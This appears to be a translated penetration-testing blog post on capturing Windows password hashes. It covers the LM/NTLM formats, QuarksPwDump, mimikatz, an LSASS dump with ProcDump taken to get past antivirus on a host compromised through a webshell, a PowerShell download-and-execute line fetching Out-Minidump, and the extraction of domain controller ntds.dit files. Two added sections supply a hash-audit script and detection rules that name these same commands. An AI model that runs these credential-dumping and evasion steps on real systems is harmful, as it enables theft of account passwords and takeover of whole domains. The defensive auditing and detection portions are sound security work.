About Windows system password capture

0x01 Windows password hashes

 

The early SMB protocol transmitted passwords over the network in clear text. Then came the "LAN Manager Challenge/Response" authentication mechanism, LM for short, which was so simple that it was easy to crack. Microsoft then proposed the Windows NT challenge/response mechanism, NTLM, and today there are the updated NTLMv2 and Kerberos schemes. The encrypted form in which Windows stores a password is called a hash. By default a Windows system password hash consists of two parts: the first part is the LM-hash, the second part is the NTLM-hash.

Compared with LM-Hash, the plaintext behind an NTLM-Hash is case-sensitive, it is impossible to tell from an NTLM-Hash whether the original password is shorter than 8 bytes, and the magic string "KGS!@#$%" is gone. MD4 is a genuine one-way hash function, so exhaustively enumerating the plaintext that served as its input is hard. The problem is that Microsoft insists on the strength of NTLM-Hash while ignoring the fact that, to preserve backward compatibility, NTLM-Hash is by default always stored together with LM-Hash. So however strong NTLM-Hash is, it does not improve security and can even weaken it: with both hashes present, one first uses the weakness of LM-Hash to enumerate the case-insensitive version of the original password, and then uses NTLM-Hash to recover the correct case.

 

The hash password format under Windows is username:RID:LM-HASH:NT-HASH. For example,

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::

means:

Username: Administrator

RID: 500

LM-HASH value: C8825DB10F2590EAAAD3B435B51404EE

NT-HASH value: 683020925C5D8569C23AA724774CE6CC

If you know a user's hash, take C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC to an online hash lookup site.
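The hash format above is what a defender audits after dumping their own SAM or ntds.dit during a password-policy review. The following is an added example, not code from the original post, that parses the user:RID:LM:NT::: format and flags the weaknesses the section describes: an LM hash still being stored, a password of at most 7 characters (the second LM half equals the well-known empty-password half, which is exactly the case in the page's Administrator line), a blank password, and an NT hash shared by several accounts. The constant hash values are public, well-known constants; the Guest and svc_backup lines in the sample are constructed for this illustration.

```python
from collections import defaultdict

# Well-known constants (public values, not taken from this page):
# LM hash of the empty password, and the 8-byte half a short password leaves untouched.
LM_EMPTY = "AAD3B435B51404EEAAD3B435B51404EE"
LM_EMPTY_HALF = LM_EMPTY[:16]
# NT hash (MD4 of the UTF-16LE empty string) of a blank password.
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"

HEX = set("0123456789ABCDEF")


def parse_pwdump_line(line):
    """Split 'user:RID:LM:NT:::' into a dict; hashes are upper-cased."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not a pwdump-format line: {line!r}")
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].upper(), "nt": parts[3].upper()}


def is_hex_hash(h):
    return len(h) == 32 and set(h) <= HEX


def audit_entry(entry):
    """Per-account findings derived from the two hash fields alone."""
    findings = []
    lm, nt = entry["lm"], entry["nt"]
    # A real LM hash (neither the empty-password value nor a 'NO PASSWORD***'
    # marker) means the case-insensitive, 7+7-split form is still stored.
    if is_hex_hash(lm) and lm != LM_EMPTY:
        findings.append("lm-hash-stored")
        # Second half equal to the empty-password half: the second 7-byte
        # block was empty, so the password is at most 7 characters long.
        if lm[16:] == LM_EMPTY_HALF:
            findings.append("password-at-most-7-chars")
    if nt == NT_EMPTY:
        findings.append("blank-password")
    return findings


def audit_dump(text):
    """Audit a whole pwdump-format dump; also flags NT hashes shared by accounts."""
    entries = [parse_pwdump_line(l) for l in text.splitlines() if l.strip()]
    report = {e["user"]: audit_entry(e) for e in entries}
    by_nt = defaultdict(list)
    for e in entries:
        if is_hex_hash(e["nt"]) and e["nt"] != NT_EMPTY:
            by_nt[e["nt"]].append(e["user"])
    for users in by_nt.values():
        if len(users) > 1:
            for u in users:
                others = ",".join(x for x in users if x != u)
                report[u].append("nt-hash-shared-with:" + others)
    return report


# Constructed sample dump. The Administrator line is the page's own example;
# the Guest and svc_backup accounts are made up for this illustration.
SAMPLE_DUMP = """\
Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
svc_backup:1001:AAD3B435B51404EEAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
"""

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(f"{user}: {', '.join(findings) or 'ok'}")
```

Run it on a real dump and the accounts listed under lm-hash-stored are the ones for which the NoLMHash policy has not yet taken effect (the LM hash is only removed on the next password change), which is the practical remediation the section's LM/NTLM discussion implies.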

 

0x02 QuarksPwDump

 

QuarksPwDump_v0.2b is generally used to dump password hashes across the whole Windows series; the hash values obtained can be looked up at http://www.objectif-securite.ch/ophcrack.php.

The QuarksPwDump command for dumping the password hashes is as follows (for other commands, refer to the software's documentation):

quarkspwdump.exe -dhl

The complete hash value obtained is then used for online cracking.

 

0x03 mimikatz

 

Use the password-dumping tool mimikatz for the same test. The commands are as follows:

privilege::debug
sekurlsa::logonpasswords

The graphical result is as follows:

 

Notice that the LM-HASH captured by mimikatz differs from the one captured by QuarksPwDump, and that mimikatz obtained the system password directly. The NT-HASH obtained by the two tools is the same.

 

During a penetration test the following scenario occurs. I have already connected the chopper webshell to the target host, but the system has 360 Security Guard or other security software installed by default, and both the mimikatz and the QuarksPwDump I uploaded were killed. That is, I cannot use the conventional approach of these two tools to obtain the system's password hashes. In fact, we can first dump the LSASS process memory of the target host and then process it with mimikatz on our own host, which yields the target's system hashes and passwords.

You can download ProcDump from Microsoft's official website; this will definitely not cause anti-virus software to flag it.

The command is as follows:

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

The diagram is as follows:

 

 

Next, demonstrate the local cracking with mimikatz:

First enter the command:

mimikatz.exe "sekurlsa::minidump lsass.dmp"

Then enter the command:

sekurlsa::logonpasswords

As can be seen, the system password can be obtained offline, which bypasses the anti-virus software on the target host.

The WooYun knowledge base also has a PowerShell command that does the same work as ProcDump. The command is as follows:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"

I tried it on the compromised host and found that it also works, although an error is displayed in the chopper's virtual terminal; in fact the PowerShell code executed successfully. Overall, though, ProcDump feels more convenient to use.

Metasploit also integrates mimikatz. For a tutorial, see http://www.offensive-security.com/metasploit-unleashed/Mimikatz

 

0x04 NTDSDump related

 

I couldn't stand the speed of NTDSXtract, so I modified quarkspwdump into an offline extraction tool that can read system.hiv.

ntds.dit is actually an ESE (esent) database, and Microsoft itself documents a series of APIs for operating on this kind of database.

Its command line is as follows:

ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]

-f  path to ntds.dit
-k  optional SYSKEY in hex format
-s  optional path to system.hiv
-h  export password history
-t  export format, LC or JOHN
-o  export to the specified file

 

SYSKEY is actually derived from the class information of several subkeys under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which can be queried with RegQueryInfoKey.

The attachment provides two export tools. getsyskey_c.exe is compiled with VC6; its source is getsyskey.cpp, which can be opened and compiled directly in VC6.

getsyskey_cs.exe is compiled with .NET 2.0; its source is getsyskey.cs, which can be compiled directly with csc.

 

Known bugs:

JetAttachDatabase() failed

Reason: the database needs to be repaired; run esentutl /p /o ntds.dit to repair it.

 

Download link:

ntdsdump

 

Addendum: after making the modification, I looked at the quarkspwdump GitHub repository and found that someone had submitted a pull request: https://github.com/quarkslab/quarkspwdump/pull/3

It adds a function that loads system.hiv by calling RegLoadKey. That API requires elevation through UAC, so it is awkward to use and not as good as reading the file directly.

 

SecPulse approach

Use ntdsutil snapshot mount to export ntds.dit, SAM and SYSTEM on a 2008+ domain controller:

ntdsutil
snapshot
activate instance ntds
create
mount {GUID}
copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
unmount {GUID}
quit
quit
Then copy the files out in whatever way you like.

 

Use QuarksPwDump.exe on the domain controller to export most of the plaintext:

QuarksPwDump.exe --dump-hash-domain --output SecPulseHash.txt --ntds-file c:\ntds.dit

Downloading it back to the local machine and then using QuarksPwDump does not seem to work, mainly because the SYSTEM file cannot be specified locally, so the key cannot be obtained.
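From the defender's side, every technique in sections 0x03 and 0x04 leaves a process-level trace: ProcDump and Out-Minidump must open a handle to lsass.exe with read rights, and the ntdsutil snapshot sequence runs ntdsutil.exe on a domain controller. The following is an added example, not code from the original post or any of the tools it names, of detection logic over Sysmon-style events (EventID 1 process creation with CommandLine and Image, EventID 10 process access with SourceImage, TargetImage and GrantedAccess). The events are constructed for this illustration, reusing the page's own command lines; the allowlist of processes that may legitimately open lsass is an assumption to be tuned per environment, and the access-mask constants are the standard Win32 PROCESS_QUERY_INFORMATION and PROCESS_VM_READ values.

```python
import re

# PROCESS_QUERY_INFORMATION | PROCESS_VM_READ: the minimum a memory dumper
# (e.g. MiniDumpWriteDump) needs on the target process (well-known Win32 values).
DUMP_ACCESS_MASK = 0x0400 | 0x0010

# Assumed allowlist of source images that legitimately open lsass with broad
# rights; a constructed starting point, not a recommendation for production.
LSASS_ACCESS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

# Command-line patterns taken from the commands shown on this page.
CMDLINE_RULES = [
    ("procdump-lsass", re.compile(r"procdump.*\s-ma\s.*lsass", re.I)),
    ("out-minidump", re.compile(r"out-minidump", re.I)),
    ("mimikatz-sekurlsa", re.compile(r"sekurlsa::", re.I)),
]
# ntdsutil is rare outside planned AD maintenance, so any execution is worth a look.
IMAGE_RULES = {"ntdsutil.exe": "ntdsutil-executed"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(ev):
    """EventID 1: match command line and image name against the rules above."""
    alerts = []
    cmd = ev.get("CommandLine", "")
    for name, rx in CMDLINE_RULES:
        if rx.search(cmd):
            alerts.append({"rule": name, "detail": cmd})
    img = basename(ev.get("Image", ""))
    if img in IMAGE_RULES:
        alerts.append({"rule": IMAGE_RULES[img], "detail": cmd})
    return alerts


def check_process_access(ev):
    """EventID 10: a non-allowlisted process opening lsass with dump-capable rights."""
    if basename(ev.get("TargetImage", "")) != "lsass.exe":
        return []
    src = basename(ev.get("SourceImage", ""))
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    if src in LSASS_ACCESS_ALLOWLIST or (granted & DUMP_ACCESS_MASK) != DUMP_ACCESS_MASK:
        return []
    return [{"rule": "lsass-handle",
             "detail": f"{ev['SourceImage']} GrantedAccess={ev['GrantedAccess']}"}]


def detect(events):
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:
            alerts.extend(check_process_create(ev))
        elif ev.get("EventID") == 10:
            alerts.extend(check_process_access(ev))
    return alerts


# Constructed sample events (not real logs); command lines are the page's own.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"EventID": 1, "Image": r"C:\Temp\Procdump.exe",
     "CommandLine": r"Procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell IEX (New-Object Net.WebClient).DownloadString("
                    "'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/"
                    "Exfiltration/Out-Minidump.ps1'); \"Get-Process lsass | Out-Minidump\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": "ntdsutil"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Temp\Procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1410"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['detail']}")
```

The command-line rules are cheap but fragile (a renamed binary defeats the procdump pattern), which is why the handle rule matters: whatever the tool is called, it still has to obtain PROCESS_VM_READ on lsass.exe, and that access is what the EventID 10 check keys on. Enabling LSA protection (RunAsPPL) or Credential Guard on the host turns that attempt into a denied open instead of a successful dump.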

 

Quarks PwDump parameters:

quarks-pwdump.exe <options>

Options:
  -dhl  --dump-hash-local
  -dhdc --dump-hash-domain-cached
  -dhd  --dump-hash-domain (NTDS_FILE must be specified)
  -db   --dump-bitlocker (NTDS_FILE must be specified)
  -nt   --ntds-file FILE
  -hist --with-history (optional)
  -t    --output-type JOHN/LC (optional, if no=>JOHN)
  -o    --output FILE (optional, if no=>stdout)

Example: quarks-pwdump.exe --dump-hash-domain --with-history

 

Of course, you can also download ntds.dit, SAM and SYSTEM back (on many large intranets ntds is several gigabytes, so downloading it is not very practical) and decrypt them with some tool, but that feels heavy. Now we can use NTDSDump.exe instead:

NTDSDump.exe -f ntds.dit -s SYSTEM -o SecPulseHash.txt

 

 

0x05 Reference links

https://www.secpulse.com/archives/6301.html

https://www.cnblogs.com/hiccup/p/4380298.html
